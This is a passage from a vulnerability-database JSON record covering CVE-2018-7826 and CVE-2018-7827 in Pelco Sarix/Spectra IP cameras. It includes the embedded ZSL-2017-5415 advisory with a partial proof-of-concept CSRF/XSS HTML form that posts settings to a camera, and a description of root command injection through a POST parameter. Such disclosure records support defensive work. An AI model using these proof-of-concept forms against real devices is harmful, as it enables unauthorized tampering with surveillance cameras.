"id": "CVE-2018-7826"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-909"
},
{
"date": "2019-05-22T20:29:01.230000",
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-909"
},
{
"date": "2024-11-21T04:12:48.163000",
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
],
"trust": 0.6
}
}
VAR-201905-1051
Vulnerability from variot - Updated: 2025-01-30 20:39A Cross-Site Scripting (XSS) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which a remote attacker can execute arbitrary HTML and script code in a user’s browser session. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric spectra enhanced ptz camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1s_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7827",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2018-7827",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CNVD-2019-16260",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2018-7827",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7827",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-7827",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16260",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-910",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Cross-Site Scripting (XSS) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which a remote attacker can execute arbitrary HTML and script code in a user\u2019s browser session. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput 